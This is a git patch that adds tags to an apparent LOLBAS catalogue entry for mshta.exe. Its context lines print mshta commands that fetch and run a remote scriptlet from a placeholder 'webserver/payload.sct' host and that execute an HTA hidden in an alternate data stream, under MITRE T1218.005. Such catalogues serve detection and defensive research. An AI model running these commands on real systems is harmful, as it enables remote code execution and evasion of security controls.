From bd07c4dd2433f1f6790ecc90fde6cdea64e2bfcd Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 16:03:39 +0200 Subject: [PATCH] Update Mshta.yml Tags Added Tags: Execute: Remote Input Custom Format Execute JScript Execute VBScript --- yml/OSBinaries/Mshta.yml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml index 8a3de9f..a3d4fde 100644 --- a/yml/OSBinaries/Mshta.yml +++ b/yml/OSBinaries/Mshta.yml @@ -13,6 +13,8 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: WSH + - Execute: Remote + - Input: Custom Format - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")")) Description: Executes VBScript supplied as a command line argument. Usecase: Execute code @@ -20,6 +22,8 @@ Commands: Privileges: User MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: VBScript - Command: mshta.exe javascript:a=GetObject("script:https://webserver/payload.sct").Exec();close(); Description: Executes JavaScript supplied as a command line argument. Usecase: Execute code @@ -27,6 +31,8 @@ Commands: Privileges: User MitreID: T1218.005 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: JScript - Command: mshta.exe "C:\ads\file.txt:file.hta" Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. Usecase: Execute code hidden in alternate data stream